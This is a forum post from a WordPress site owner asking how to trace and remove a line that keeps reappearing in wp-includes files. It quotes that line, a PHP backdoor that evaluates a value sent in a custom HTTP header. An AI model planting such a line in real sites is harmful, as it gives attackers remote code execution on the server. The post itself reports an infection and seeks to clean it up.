I’ve had an issue recently across a number of hosted sites where a line is being added to a seemingly random file in the wp-includes directory of the core files.
The added line is a variation of this: @eval($_SERVER[‘HTTP_52BD9D0’]);
If I remove it, it reappears. If I replace the entire WP install, the line is added again immediately.
I can’t find it in a plugin, Wordfence picks up the modification, but not the source. I’m assuming it’s in the database somewhere, but I can’t find where.
If I comment out that line, it puts the issue on pause – the entry isn’t uncommented, and isn’t added again. I’m assuming, being commented out, that it’s inert, but it’s still a concern.
Does anyone have any experience with this? Any idea where to find and remove it at the source?